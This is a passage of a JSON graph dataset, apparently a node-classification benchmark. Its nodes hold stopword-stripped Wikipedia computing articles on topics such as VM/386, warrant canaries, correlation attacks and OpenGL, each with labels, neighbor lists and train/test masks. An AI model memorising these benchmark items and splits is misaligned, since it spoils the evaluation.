memory reloaded secondary storage processes entirely independent much trouble program multitasking environment complexity multitasking systems comes need share computer resources tasks synchronize operation co-operating tasks various concurrent computing techniques used avoid potential problems caused multiple tasks attempting access resource bigger systems sometimes built central processor number i/o processors kind asymmetric multiprocessing years multitasking systems refined modern operating systems generally include detailed mechanisms prioritizing processes symmetric multiprocessing introduced new complexities capabilities",
    "neighbors": [
      2560,
      2051,
      10757,
      9224,
      3081,
      6155,
      6675,
      7187,
      7699,
      8725,
      10776,
      25,
      10267,
      8732,
      4637,
      9762,
      4643,
      6180,
      5158,
      6184,
      3626,
      45,
      7217,
      7218,
      10803,
      9784,
      10809,
      570,
      58,
      576,
      2113,
      2625,
      6221,
      5711,
      10838,
      3160,
      7771,
      2140,
      10333,
      97,
      4194,
      11363,
      7269,
      5223,
      6760,
      10856,
      8298,
      8810,
      9835,
      4205,
      8301,
      7285,
      6774,
      4727,
      2168,
      9335,
      634,
      1147,
      7802,
      3197,
      1150,
      639,
      5247,
      11390,
      2179,
      10883,
      7814,
      10891,
      6797,
      10382,
      7313,
      9366,
      6296,
      2201,
      9370,
      9882,
      7325,
      6815,
      9887,
      2210,
      1702,
      5798,
      8879,
      3248,
      7857,
      178,
      9907,
      11444,
      6837,
      6329,
      8889,
      6652,
      1213,
      4286,
      5823,
      1219,
      8388,
      8902,
      1736,
      2248,
      9932,
      5840,
      4308,
      3286,
      7382,
      2264,
      8410,
      731,
      9436,
      9438,
      1247,
      5856,
      11487,
      11489,
      1253,
      7403,
      5356,
      2285,
      1776,
      242,
      2290,
      5363,
      8949,
      3321,
      9466,
      2811,
      3323,
      6909,
      1278,
      7421,
      8447,
      9468,
      11513,
      10499,
      1804,
      8976,
      273,
      785,
      787,
      276,
      789,
      5397,
      7445,
      7446,
      8977,
      11539,
      7963,
      10016,
      292,
      10235,
      2345,
      4909,
      7983,
      7986,
      2355,
      7477,
      8501,
      823,
      1848,
      4409,
      8502,
      6459,
      5948,
      7483,
      7999,
      3904,
      10561,
      8514,
      11075,
      5956,
      4423,
      7497,
      330,
      1866,
      3916,
      5452,
      6988,
      8523,
      9033,
      5457,
      10065,
      7507,
      11601,
      2901,
      7511,
      344,
      5976,
      2394,
      10590,
      2399,
      8544,
      3426,
      11618,
      868,
      4966,
      8551,
      4968,
      11114,
      5484,
      7020,
      11123,
      5492,
      2933,
      10612,
      11635,
      376,
      10104,
      8573,
      5503,
      7039,
      8063,
      10113,
      4996,
      8069,
      394,
      3978,
      4492,
      7057,
      5523,
      8083,
      11667,
      11675,
      6044,
      8092,
      2462,
      5022,
      2979,
      7076,
      421,
      1445,
      935,
      9126,
      4521,
      6570,
      9643,
      4525,
      11184,
      7601,
      8114,
      2995,
      10675,
      9141,
      10676,
      6075,
      6078,
      9151,
      4548,
      11204,
      8646,
      11205,
      1480,
      4040,
      8136,
      9162,
      9166,
      6100,
      470,
      5078,
      2008,
      5090,
      11236,
      7142,
      2536,
      10730,
      10731,
      8687,
      6128,
      5105,
      499,
      5619,
      5115,
      508
    ],
    "mask": "None"
  },
  {
    "node_id": 2346,
    "label": 7,
    "text": "Run-time_infrastructure_(simulation):run-time infrastructure simulation simulation run-time infrastructure rti middleware required implementing high level architecture hla rti fundamental component hla provides set software services necessary support federates coordinate operations data exchange runtime execution sense implementation hla interface specification part specification modern rti implementations conform ieee 1516 and/or hla 1.3 api specifications specifications include network protocol rti implementors rti create specification due interoperability rti products often rti versions assumed unless vendor specifies interoperability products versions",
    "neighbors": [
      8122,
      11109,
      756,
      7045
    ],
    "mask": "None"
  },
  {
    "node_id": 2347,
    "label": 3,
    "text": "Golvellius:golvellius sega licensed franchise 1988 released remake game master system mark iii japan featuring enhanced graphics entirely different overworld dungeon layouts version released worldwide name golvellius valley doom later year 1988 compile released yet another remake msx2 system titled game featured mostly graphics ones sega master system version overworld dungeon layouts entirely different 2009 announced dotemu/d4 entreprise golvellius re-released iphone os platform scenario three different versions golvellius ending promised sequel never developed/released however spin-off game titled super cooks came included 1989 release disc station special shoka gou",
    "neighbors": [
      10931,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 2348,
    "label": 1,
    "text": "Propel_(PHP):propel php propel free open-source mit object-relational mapping toolkit written php also integral part php framework symfony default orm including version 1.2 propel project started august 2003 availability beta versions php version 5 version 5 php finally able provide level support object-oriented programming made projects like propel possible also created demand hitherto-missing components large-scale object-oriented architectures propel originally based apache torque project java language orm project propel primary function provide mapping php classes database tables accomplish propel includes generator component uses source code generation build php classes based datamodel definition written xml propel also includes runtime component manages connections transactions idiosyncratic rules describe workings rdbms used propel",
    "neighbors": [
      3080,
      1034,
      6154,
      9614,
      2465,
      7074,
      7983,
      190,
      8644,
      11259,
      4171,
      10587,
      11357,
      479,
      3553,
      7785,
      7147,
      5612,
      4853,
      9467,
      7293
    ],
    "mask": "Train"
  },
  {
    "node_id": 2349,
    "label": 3,
    "text": "Imagination_Creator:imagination creator creator family single-board computers developed imagination technologies promote educational research software development based mips architecture first board platform creator ci20 released august 2014 second development kit called creator ci40 introduced kickstarter campaign november 2015 creator ci20 board based ingenic jz4780 mobile-class application processor contains dual-core 1.2 ghz mips32 cpu 32k l1 cache 512k l2 cache ieee754 floating point unit coupled powervr sgx540 gpu processor supports mxu 32-bit simd extension addition board provides creator ci40 board based cxt200 chip optimized specifically iot applications contains dual-core dual-threaded 550 mhz mips interaptiv cpu 32k l1 cache 512k l2 cache ieee754 floating point unit coupled ensigma c4500 wi-fi radio processor addition board provides creator boards support creator iot framework open source software package based lwm2m protocol developed open mobile alliance",
    "neighbors": [
      7234,
      2349,
      7983,
      1776,
      1427,
      4124
    ],
    "mask": "Test"
  },
  {
    "node_id": 2350,
    "label": 3,
    "text": "LGA_1356:lga 1356 lga 1356 land grid array 1356 pins also called socket b2 intel microprocessor socket released q1 2012 two processor 2p i.e dual socket segment server market supports 3 64-bit wide ddr3 channels whereas socket lga 2011 supports 4 channels socket lga 1155 supports 2 channels lga 1356 one two sockets designed replacement lga 1366 cpu socket lga 2011 known socket r lga 1356 1356 protruding pins make contact pads processor processors lga 1356 lga 1366 sockets compatible since different socket notches supports intel sandy bridge-en microprocessors code-named romley-en marketed xeon e5-2400 series main difference lga 2011 lga 1356 2 intel quickpath interconnect qpi connections lga 2011 1 qpi connection lga 1356 noticeable differences include 24 lanes pci express pci-e version 3.0 connections compared 40 lanes lga 2011 three channels ddr3 support compared four lga 2011 ddr3 channel support one dimm applicable ddr3 ddr3-l plans leaked early 2011 estimated releases first quarter 2012 september 2011 releases estimated end first quarter 2012 socket b2 processors following mechanical maximum load limits exceeded heatsink assembly shipping conditions standard use load limits crack processor die make unusable processors using socket static load limit previous models using lga 1366 socket b",
    "neighbors": [
      3588,
      5901,
      5649,
      5523,
      4886,
      2455,
      3992,
      8855,
      11417,
      3995,
      4252,
      6175,
      7714,
      10019,
      4523,
      2604,
      6192,
      9649,
      4537,
      7105,
      4805,
      7110,
      8394,
      3403,
      4427,
      5073,
      4179,
      3798,
      4185,
      7002,
      9945,
      11484,
      9570,
      10468,
      613,
      1000,
      8552,
      1260,
      4717,
      10225,
      371,
      9592,
      8442
    ],
    "mask": "Train"
  },
  {
    "node_id": 2351,
    "label": 9,
    "text": "Pnuts:pnuts pnuts dynamic scripting language java platform designed used dual language system java programming language goals pnuts project provide small fast scripting language tight integration java language pnuts uses syntax simple friendly java developers also expressive java pnuts share type system java code easily invoke define pnuts functions likewise pnuts code easily manipulate java objects pnuts code even define java classes pnuts compiles java byte codes classes used java like class class written pnuts even later replaced class written java code changes pnuts syntax look similar java following code sample written java also valid pnuts script alternatively expressiveness pnuts could utilized pnuts originally developed 1997 toyokazu tomatsu testing tool java classes pnuts since extended mainly focusing essential functionality required java-based scripting engine module system bytecode compiler commercial usage pnuts includes rockwell automation factorytalk development system looks like project longer development",
    "neighbors": [
      9345,
      5612,
      5677,
      7983,
      9780
    ],
    "mask": "None"
  },
  {
    "node_id": 2352,
    "label": 9,
    "text": "M-expression:m-expression computer programming m-expressions meta-expressions early proposed syntax lisp programming language inspired contemporary languages fortran algol john mccarthy published first paper lisp 1960 research fellow massachusetts institute technology described language symbolic expressions s-expressions could represent complex structures lists defined set primitive operations s-expressions language meta-expressions m-expressions could used define complex operations finally showed meta-language could represented s-expressions resulting system potentially self-hosting mccarthy planned develop automatic lisp compiler using m-expressions language syntax s-expressions describe compiler internal processes stephen b. russell read paper suggested s-expressions convenient syntax although mccarthy disapproved idea russell colleague daniel j. edwards hand-coded interpreter program could execute s-expressions program adopted mccarthy research group establishing s-expressions dominant form lisp mccarthy reflected fate m-expressions 1979 recent circa 2003 variant i-expressions use indentation indicate parentheses implicitly thus ways intermediate s-expressions m-expressions i-expressions introduced scheme request implementation 49 auxiliary syntax scheme widely adopted",
    "neighbors": [
      512,
      4992,
      10752,
      11269,
      3334,
      6919,
      7562,
      2062,
      9231,
      5651,
      1301,
      9749,
      9877,
      8728,
      4633,
      6556,
      3869,
      10012,
      2335,
      6047,
      8479,
      8226,
      4516,
      5031,
      9128,
      5033,
      5803,
      2225,
      10547,
      11255,
      311,
      2105,
      7867,
      6717,
      4799,
      5569,
      6594,
      8771,
      4550,
      7880,
      8908,
      1613,
      205,
      11218,
      9299,
      10712,
      3034,
      3675,
      10463,
      7392,
      7904,
      11488,
      7267,
      10083,
      8293,
      6502,
      2666,
      3051,
      5360,
      5361,
      9714,
      8435,
      3446,
      5751,
      3960,
      6906,
      7805
    ],
    "mask": "None"
  },
  {
    "node_id": 2353,
    "label": 3,
    "text": "RH1750:rh1750 rh1750 radiation-hardened implementation mil-std-1750a processor produced gec-plessey marconi communications primary target market aerospace industry",
    "neighbors": [
      10098
    ],
    "mask": "Test"
  },
  {
    "node_id": 2354,
    "label": 4,
    "text": "Jon_Callas:jon callas jon callas american computer security expert software engineer user experience designer technologist co-founder former cto global encrypted communications service silent circle held major positions digital equipment corporation apple pgp entrust considered one respected well-known names mobile security industry callas credited creating several internet engineering task force ietf standards including openpgp dkim zrtp wrote prior work entrust chief technical officer co-founder pgp corporation former chief technical officer entrust website callas describes entrepreneur innovator information business security including cryptography operating system security public key infrastructure intellectual property rights well innovator human-computer interactions collaboration social virtual reality also worked bruce schneier counterpane internet security one primary authors dkim method chief scientist original pgp inc. founded phil zimmermann callas member infosec think tank shmoo group callas received bsc mathematics university maryland college park attended 1977 1980 minored philosophy english literature member technical staff century computing 1980 1981 served principal software engineer digital equipment 1981 1993 working got work wide variety things graphics schedulers memory management operating system security created random password generator digital equipment designed pathworks network operating system well software macintosh client systems server systems running vms unix created cross-platform communications computers running mac os vms unix windows os/2 using appletalk decnet tcp/ip networks also developed software 3d pex ddx openvms osf/1 windows nt digital equipment folded callas co-founded world benders inc. worked 1993 1995 world benders lead architect developer meeting space cross-platform group collaboration product allowed people conduct meetings real-time existing networks callas held title senior scientist ii apple computer 1995 1997 describes firm ’ security privateer designed built next-generation cryptographic security products mac os x ios including 'filevault 2 full-disk encryption product also designed concurrent programming system high-performance computing 'transforms addition led engineering approvals fips 140 validation ios callas trusted security apple operating system worked apple whole disk encryption worst time working apple year steve jobs came back callas said apple worked gursharan sidhu inventor appletalk callas shipped first crypto built os called powertalk said failed far early although colleague bruce gaya managed hack piece password manager called keychain could run without rest powertalk thus rescued oblivion present keychain apple products completely utterly rewritten ’ proud saving joined pgp inc. developer pretty good privacy january 1997 chief scientist network associates nai bought pgp december 1997 callas became cto total network security division nai creating architecture direction company network security products serving primary author ietf openpgp standard director software engineering counterpane 1999 2001 serving co-architect counterpane managed security monitoring system – redundant system adaptive fail-over monitors networks three continents also led engineering team built system taking prototype operational four months managed counterpane export control process getting approval system including fifteen new ciphers senior architect wave systems corporation 2001 2002 lead architect wave embassy trust system performed security analysis created product security subsystems co-founded new pgp corporation 2002 worked server architect pgp july 2002 october 2009 time company principal author ietf openpgp standard rfc2440 developed pgp pretty good privacy universal server security privateer could tell 'd kill associates october 2009 july 2011 chief technical officer entrust provider identity-based security software july 2011 january 2013 co-founded silent circle 2012 blackphone 2013 continued serve cto silent circle april 2016 led development operations groups former produces apps manifest silent circle services subscribers latter runs actual services callas holds patents patents pending several systems methods erasing media facilitating secure media access secure transparent electronic communications dynamic security operations partial message authentication facilitating encryption decryption operations email server callas security product designs major innovation awards wall street journal others one primary authors dkim method member infosec think tank shmoo group served adjunct professor indiana university since 2012 callas lectured widely computers internet security scheduled speaker oslo freedom forum 2014 callas selected one two keynote speakers 2015 pdf technical conference san jose california may 2016 callas rejoined apple callas appeared january 11 2018 episode john wants answers callas stated tech companies bigger threat privacy government views stem big tech mass pooling personal data advertising polarization within silicon valley companies committed privacy many earn revenues selling user data callas stated advertising market takes downturn companies protect users data insulated harm lives san jose california",
    "neighbors": [
      1315,
      11653,
      2800,
      4793,
      8283,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 2355,
    "label": 2,
    "text": "VM/386:vm/386 vm/386 multitasking operating system 'control program took early advantage capabilities intel 386 processor utilizing virtual 8086 mode users able run existing text-based graphical dos software safely separate environments system offered high degree control ability set memory cpu usage limits unique config.sys autoexec.bat files could configured application even different dos versions 1991 vendor announced intentions support dpmi 1.0 vm/386 vm/386 initially developed softguard systems producer copy-protection software plans include features like non-dos system support financial constraints forced sale intelligent graphics corporation igc launched product 1987 pc magazine award technical excellence 1988 company also introduced multi-user version allowed number serial terminals even graphical systems connected single 386 computer current versions software built multi-user support handle tens users networked environment windows 3.11 support access controls virtual memory device sharing among features version software designed cooperate unix bundled everex systems workstations system sees use mainly vertical applications like point-of-sale systems ability run reliably cheap reliable hardware outweigh gains newer operating systems complex less reliable early competition included desqview 386 sunny hill software omniview starpath systems vmos/3 windows/386 2.01 target market shifted away single-user systems multiple-user setups many serial terminals began compete directly likes multiuser dos pc-mos/386",
    "neighbors": [
      2179,
      10499,
      10757,
      10883,
      394,
      3978,
      1804,
      6797,
      273,
      7057,
      6675,
      7187,
      11539,
      9366,
      11667,
      6296,
      2201,
      25,
      10776,
      8092,
      4637,
      7325,
      9887,
      10016,
      9762,
      421,
      5158,
      10235,
      2345,
      4394,
      7983,
      3248,
      7217,
      11184,
      6837,
      9525,
      823,
      9784,
      4409,
      10809,
      6075,
      7483,
      6078,
      2811,
      576,
      9151,
      11075,
      8388,
      4423,
      8136,
      6730,
      2380,
      9932,
      5840,
      5457,
      11601,
      7382,
      8410,
      10333,
      10590,
      5856,
      97,
      1253,
      8551,
      8298,
      8301,
      6128,
      5363,
      5492,
      5619,
      7285,
      9335,
      2168,
      1147,
      3197,
      1150
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2356,
    "label": 5,
    "text": "Professional_video_over_IP:professional video ip professional video ip systems use existing standard video codec reduce program material bitstream e.g. mpeg transport stream use internet protocol ip network carry bitstream encapsulated stream ip packets typically accomplished using variant rtp protocol carrying professional video ip networks special challenges compared non-time-critical ip traffic many problems similar encountered voice ip much higher level engineering requirements particular strict quality service requirements must fulfilled use professional broadcast environments since even well-engineered ip networks tend small residual packet loss rate caused low-probability statistical congestion events amplification bit errors underlying hardware professional solutions use kind forward error correction ensure encoded video stream reconstructed even packets lost typically applied packet level since encapsulated video bitstream typically designed tolerate low levels bit burst errors rather loss whole packets resending packets option sequential nature underlying video signal live video resent packet would arrive well arrival next frame video network delay variation kept minimum using high-speed network backbone ensuring video traffic encounter excessive queue delays typically done either ensuring network close full capacity video traffic prioritized using traffic engineering techniques see remaining delay variation removed buffering expense added time delay forward error correction used small proportion packets arriving deadline tolerated since dealt discarded receipt treated way lost packets added time delay particularly unwelcome ptz cameras makes operator control difficult values 250ms problem presented latency variation makes synchronization complex making recovery underlying timing video signal far difficult typically solved genlocking ends system external station sync signals typically generated sources gps atomic clocks thus requiring extraction coarse timing information receiving end order achieve high-quality video synchronization extraction coarse timing data typically done using phase locked loop long time constant even packet loss mitigation video ip work network capable carrying content reasonable maximum packet loss rate practice means video ip work overloaded networks since ip offer traffic guarantees must applied network engineering level one approach quality service approach simply allocates sufficient bandwidth video-carrying traffic congest possible load pattern approaches include dynamic reduction frame rate resolution network admission control bandwidth reservation traffic shaping traffic prioritization techniques require complex network engineering work simple approach building non-blocking network possible see rsvp one approach ip network traffic engineering pro-mpeg wide area network group done much recent work creating draft standard interoperable professional video ip within security products industry ip-based closed circuit television cctv making gains analog market key components ip-based cctv remain consistent analog technologies image capture combination ip-based cameras analog cameras using ip-based encoders image transmission storage retrieval uses technologies raid arrays iscsi recorded indexed video video management affords web browser-enabled management control ip-based cctv systems one key advantage ip-based cctv ability use network infrastructure providing adequate bandwidth availability switching routing rather coaxial cabling however running bandwidth-intensive surveillance video corporate data networks point organizational contention depending potential impact network performance class companies produce video management software help manage capture storage video content digital video also makes possible video content analysis allows automatic detection identification various kinds objects motion also another emerging model off-site storage surveillance video online surveillance providers utilizing cloud computing technologies consolidate multi-site surveillance video web manufacturers cctv equipment steadily integrating ip network technology product portfolios",
    "neighbors": [
      5472,
      9381,
      1710,
      1876,
      7863,
      6586
    ],
    "mask": "None"
  },
  {
    "node_id": 2357,
    "label": 4,
    "text": "Correlation_attack:correlation attack cryptography correlation attacks class known plaintext attacks breaking stream ciphers whose keystream generated combining output several linear feedback shift registers called lfsrs rest article using boolean function correlation attacks exploit statistical weakness arises poor choice boolean function – possible select function avoids correlation attacks type cipher inherently insecure simply essential consider susceptibility correlation attacks designing stream ciphers type correlation attacks possible significant correlation output state one individual lfsr keystream generator output boolean function combines output state lfsrs combined partial knowledge keystream easily derived partial knowledge plaintext two simply xored together allows attacker brute-force key individual lfsr rest system separately instance keystream generator four 8-bit lfsrs combined produce keystream one registers correlated boolean function output may brute force first remaining three total attack complexity 2 2 compared cost launching brute force attack entire system complexity 2 represents attack effort saving factor 256 substantial second register correlated function may repeat process drop attack complexity 2 2 2 effort saving factor 65028 sense correlation attacks considered divide conquer algorithms correlation attacks perhaps best explained via example consider case geffe keystream generator geffe generator consists three lfsrs lfsr-1 lfsr-2 lfsr-3 denote outputs registers formula_1 formula_2 formula_3 respectively boolean function combines three registers provide generator output given formula_4 i.e formula_1 formula_2 xor formula_1 formula_3 2 8 possible values outputs three registers value combining function shown table consider output third register formula_3 table makes clear 8 possible outputs formula_3 6 equal corresponding value generator output formula_11 i.e formula_12 75 possible cases thus say lfsr-3 correlated generator weakness may exploit follows suppose intercept ciphertext formula_13 plaintext formula_14 encrypted stream cipher using geffe generator keystream generator i.e formula_15 formula_16 formula_17 output lfsr-1 time formula_18 etc suppose know part plaintext e.g know formula_19 first 32 bits plaintext corresponding 4 ascii characters text improbable may seem know plaintext valid xml file instance know first 4 ascii characters must xml similar many file formats network protocols standard headers footers guessed easily given intercepted formula_20 known/guessed formula_19 may easily find formula_22 formula_23 xoring two together know 32 consecutive bits generator output may begin brute force search space possible keys initial values lfsr-3 assuming know tapped bits lfsr-3 assumption line kerckhoffs principle given key keyspace may quickly generate first 32 bits lfsr-3 output compare recovered 32 bits entire generator output established earlier 75 correlation output lfsr-3 generator know correctly guessed key lfsr-3 approximately 24 first 32 bits lfsr-3 output match corresponding bits generator output guessed incorrectly expect roughly half 16 first 32 bits two sequences match thus may recover key lfsr-3 independently keys lfsr-1 lfsr-2 stage reduced problem brute forcing system 3 lfsrs problem brute forcing single lfsr system 2 lfsrs amount effort saved depends length lfsrs realistic values substantial saving make brute force attacks practical need stop observe table formula_2 also agrees generator output 6 times 8 correlation 75 correlation formula_2 generator output may begin brute force attack lfsr-2 independently keys lfsr-1 lfsr-3 leaving lfsr-1 unbroken thus able break geffe generator much effort required brute force 3 entirely independent lfsrs meaning geffe generator weak generator never used generate stream cipher keystreams note table formula_1 agrees generator output 4 times 8 50 correlation use brute force lfsr-1 independently others correct key yield output agrees generator output 50 time average incorrect key represents ideal situation security perspective combining function formula_11 chosen correlation variable combining function output close possible 50 practice may difficult find function achieves without sacrificing design criteria e.g period length compromise may necessary example illustrates well relatively simple concepts behind correlation attacks perhaps simplifies explanation precisely brute forcing individual lfsrs proceeds make statement incorrectly guessed keys generate lfsr output agrees generator output roughly 50 time given two random bit sequences given length probability agreement sequences particular bit 0.5 however specific individual incorrect keys may well generate lfsr output agrees generator output less often exactly 50 time particularly salient case lfsrs whose correlation generator especially strong small enough correlations certainly outside realm possibility incorrectly guessed key also lead lfsr output agrees desired number bits generator output thus may able find key lfsr uniquely certainty may instead find number possible keys although still significant breach cipher security say megabyte known plaintext situation would substantially different incorrect key may generate lfsr output agrees 512 kilobytes generator output likely generate output agrees much 768 kilobytes generator output like correctly guessed key would rule weaker correlation individual register generator output known plaintext required find register key high degree confidence readers background probability theory able see easily formalise argument obtain estimates length known plaintext required given correlation using binomial distribution correlations exploited example attack geffe generator examples called first order correlations correlations value generator output individual lfsr possible define higher order correlations addition instance may possible given boolean function strong correlations individual registers combines significant correlation may exist boolean function two registers e.g formula_28 would example second order correlation define third order correlations obvious way higher order correlation attacks powerful single order correlation attacks however effect subject law limiting returns table shows measure computational cost various attacks keystream generator consisting eight 8-bit lfsrs combined single boolean function understanding calculation cost relatively straightforward leftmost term sum represents size keyspace correlated generators rightmost term represents size keyspace remaining generators higher order correlations lead powerful attacks also difficult find space available boolean functions correlate generator output increases number arguments function boolean function formula_29 n variables said -th order correlation immune -th order correlation immunity integer significant correlation exists function output boolean function inputs example boolean function first order second order correlations third order correlation exhibits 2nd order correlation immunity obviously higher correlation immunity makes function suitable use keystream generator although thing needs considered siegenthaler showed correlation immunity boolean function algebraic degree n variables satisfies ≤ n given set input variables means high algebraic degree restrict maximum possible correlation immunity furthermore function balanced ≤ n − 1 follows impossible function n variables n -th order correlation immune also follows fact function written using reed-muller basis combination xors input functions given possibly extreme severity correlation attack impact stream cipher security considered essential test candidate boolean combination function correlation immunity deciding use stream cipher however important note high correlation immunity necessary sufficient condition boolean function appropriate use keystream generator issues consider e.g whether function balanced whether outputs many roughly many 1 0 possible inputs considered research conducted methods easily generating boolean functions given size guaranteed least particular order correlation immunity research uncovered links correlation immune boolean functions error correcting codes",
    "neighbors": [
      7556,
      262,
      2567,
      3084,
      2957,
      3984,
      7056,
      658,
      660,
      1173,
      1941,
      3477,
      4128,
      1315,
      4389,
      10662,
      6954,
      11185,
      10806,
      1847,
      9528,
      7161,
      2110,
      10315,
      6863,
      8273,
      9170,
      7635,
      212,
      9556,
      10963,
      11349,
      2265,
      7643,
      9697,
      8674,
      229,
      618,
      1898,
      881,
      1654,
      11639,
      6905,
      7034
    ],
    "mask": "None"
  },
  {
    "node_id": 2358,
    "label": 4,
    "text": "Penny_Black_(research_project):penny black research project penny black project microsoft research project tries find effective practical ways fighting spam identifying spams consumes recipient time idea make sender emails pay certain amount sending currency mode payment could cpu cycles turing tests memory cycles payment would limit spammers ability send large quantities emails quickly project name derived penny black world first adhesive stamp used paid postage goal project move e-mail costs receiver sender general idea sender must prove expended certain amount effort specifically receiver message alone project aims devise method without introducing additional challenge-response mechanisms third parties without requiring extra maintenance updates retaining current architecture e-mail system one project ideas ticket server credit-based method validating emails tickets would required perform actions sending emails three operations ticket server provides request ticket cancel ticket refund ticket server would allow user request ticket exchange proof work expending cpu cycles solving hard algorithms processing power turing tests even paying money server could also cancel ticket example receiving email ticket receiver could request ticket cancelled reused person cancels ticket also option refund ticket sender causes original sender regain new ticket example user might refund ticket came email spam using friendly trusted emails would little cost tickets would frequently refunded however spammers would required invest either lot computing time money order create enough tickets send large numbers e-mails one obvious flaws project entirely stop spam hopes slow spam enough longer cost effective spammers using methods reduce spam also require policies universal amongst mail clients intended mass email may also work intended example subscribers particular email service may end getting emails significant delay email service also become increased expenses provider",
    "neighbors": [
      5920,
      5956,
      6762,
      6639,
      7983,
      3922,
      3508,
      10263,
      7482,
      2140
    ],
    "mask": "Test"
  },
  {
    "node_id": 2359,
    "label": 5,
    "text": "DIXIE:dixie dixie obsolete protocol accessing x.500 directory services dixie intended provide lightweight means clients access x.500 directory services dixie allowed tcp/ip clients connect dixie-to-dap gateway would provide access x.500 directory service design allows client access directory without requiring support cumbersome open systems interconnection protocol stack dixie created 1990 university michigan tim howes mark smith bryan beecher dixie formally specified rfc 1249 published 1991 university offered completed unix implementation protocol including dixie server application development library dixie clients dixie client apple macintosh also provided efforts led development lightweight directory access protocol ldap replaced dixie created acronym dixie stand anything however later became known stand directory interface x.500 implemented efficiently",
    "neighbors": [
      11456,
      6054,
      6651,
      5531,
      10238
    ],
    "mask": "Test"
  },
  {
    "node_id": 2360,
    "label": 4,
    "text": "Warrant_canary:warrant canary warrant canary method communications service provider aims inform users provider served secret government subpoena despite legal prohibitions revealing existence subpoena warrant canary typically informs users secret subpoena particular date canary updated time period specified host warning removed users assume host served subpoena intention allow provider warn users existence subpoena passively without disclosing others government sought obtained access information records secret subpoena secret subpoenas covered 18 u.s.c §2709 c usa patriot act provide criminal penalties disclosing existence warrant third party including service provider users united states secret subpoenas national security letters originated 1986 electronic communications privacy act used suspected agents foreign power revised 2001 patriot act secret subpoenas used anyone may information deemed relevant counter-intelligence terrorism investigations idea using negative pronouncements thwart nondisclosure requirements court orders served secret warrants first proposed steven schear cypherpunks mailing list mainly uncover targeted individuals isps also suggested used public libraries 2002 response usa patriot act would force librarians disclose circulation history patrons first commercial use warrant canary us cloud storage provider rsync.net began publishing canary 2006 addition digital signature provides recent news headline proof warrant canary recently posted well mirroring posting internationally november 5 2013 apple became prominent company publicly state never received order user data section 215 patriot act september 18 2014 gigaom reported warrant canary statement appear anymore next two apple transparency reports covering july–december 2013 january–june 2014 tumblr also included warrant canary transparency report issued february 3 2014 august 2014 online cloud service spider oak implemented encrypted warrant canary publishes clear message every 6 months three pgp signatures geographically distributed signers must sign message — government agency forced spideroak update page would need enlist help three signers september 2014 us security researcher moxie marlinspike wrote every lawyer 've spoken indicated 'canary remove choose update would likely legal consequences simply posting something explicitly says 've received something matter court exercising judicial power warrant could obtained another person prohibits disclosure existence non-existence however could easily remedied amalgamating right fair trial warrant canary australia everyone right fair trial case law larger picture law right access lawyer one write warrant canary way seeks access legal representation may effect triggering canary informing larger public existence secret warrant authority object remove notice seeking legal representation could seen authority infringement legal right australia goal canary effectively causing stay proceedings common law jurisdictions would cure inherent prohibition reducing warrant canaries matter negative positive action addition notice removal notice whatever case may australia outlawed use certain kind warrant canary march 2015 making illegal journalist disclose information existence non-existence warrant issued new mandatory data retention laws unlikely journalist could give correct canary situation anyway legislation agency obtaining warrant compelled inform journalist warrant afterwards computer security privacy specialist bruce schneier wrote blog post p ersonally never believed warrant canaries would work relies fact prohibition speaking n't prevent someone speaking courts generally n't impressed sort thing easily imagine secret warrant includes prohibition triggering warrant canary know right secret legal proceedings issue said case law specific united states would render covert continuance warrant canaries subject constitutionality challenges west virginia state board education v. barnette wooley v. maynard rule free speech clause prohibits compelling someone speak one wishes easily extended prevent someone compelled lie new york times co. v. united states protects one exercising first amendment publish government information even wishes government except grave exceptional circumstances previously set act precedent latter also carries weight acting direct government intervention similar government intervention warrant canary following list companies organizations whose warrant canaries longer appear transparency reports 2015 coalition organizations consisting eff freedom press foundation nyu law calyx institute berkman center created website called canary watch order provide compiled list companies providing warrant canaries mission provide prompt updates changes canary state often difficult users ascertain canary validity thus canary watch aimed provide simple display active canaries blocks time active may 2016 announced canary watch longer accept submissions new canaries monitor existing canaries changes take downs coalition organizations created canary watch explained decision discontinue project stating achieved goals raise awareness illegal unconstitutional national security process including national security letters secret court processes electronic frontier foundation also noted fact canaries non-standard makes difficult automatically monitor changes takedowns",
    "neighbors": [
      1315,
      7437,
      8446,
      4063
    ],
    "mask": "Train"
  },
  {
    "node_id": 2361,
    "label": 2,
    "text": "Comparison_of_OpenGL_and_Direct3D:comparison opengl direct3d direct3d opengl competing application programming interfaces apis used applications render 2d 3d computer graphics hardware acceleration process commonplace since approximately 1999. graphics processing units gpus almost always implement one version apis examples include directx 9 opengl 2 circa 2004 directx 10 opengl 3 circa 2008 recently directx 11 opengl 4 circa 2011 gpus support recent versions standards backward-compatible applications use older standards example one run older directx 9 games recent directx 11-certified gpu direct3d application development targets microsoft windows platform opengl api open standard means various hardware makers operating system developers freely create opengl implementation part system opengl implementations exist wide variety platforms notably opengl dominating graphics api unix-like computer systems application developer perspective direct3d opengl equally open full documentation necessary development tools available restrictions detail two computer graphics apis following note many essential opengl extensions methods although documented also patented thus imposing serious legal troubles implement see issues mesa opengl direct3d implemented display device driver significant difference however direct3d implements api common runtime supplied microsoft turn talks low-level device driver interface ddi opengl every vendor implements full api driver means api functions may slightly different behavior one vendor next glsl shader compilers different vendors also show slightly different behavior following compares two apis structured around various considerations mostly relevant game development proprietary direct3d officially implemented microsoft windows family operating systems including embedded versions used xbox family video game consoles sega dreamcast several mostly functional reimplementations direct3d api made third parties wine project port common windows apis unix-like operating systems cedega proprietary fork wine however process progressively impeded due interdependence directx upon many proprietary components windows direct3d proprietary nature requires difficult process reverse engineering opengl implementations available across many platforms including microsoft windows unix-based systems mac os x linux nintendo sony developed libraries similar identical opengl subset opengl chosen main graphics library android blackberry ios symbian opengl es form microsoft opengl driver provides hardware acceleration windows vista support dropped windows xp soon failed deliver fahrenheit graphics api low level support opengl-direct3d merger late 1990s opengl hardware acceleration windows achieved users first installing installable client drivers icds developed gpu makers icds virtually cases bundled standard driver download package hardware vendor ihv installing recent graphics drivers sufficient provide hardware opengl support recently google almost native graphics layer engine angle project provides means convert opengl es 2.0 application calls directx 9 done webgl subset variant opengl web run common direct3d runtime means less variation vendors first version direct3d 1996 elicited broad criticism even simple operations state changes required creating submitting objects called execute buffers contrast opengl state changes performed one function call direct3d model frustrated many programmers famous complaint made high-profile game developer john d. carmack codice_1 file urged microsoft abandon direct3d favor opengl chris hecker made similar request open letter microsoft april–may 1997 issue game developer magazine version 5 second version named reflect release part directx 5 replaced execute buffers new drawprimitive api still considered cumbersome chris 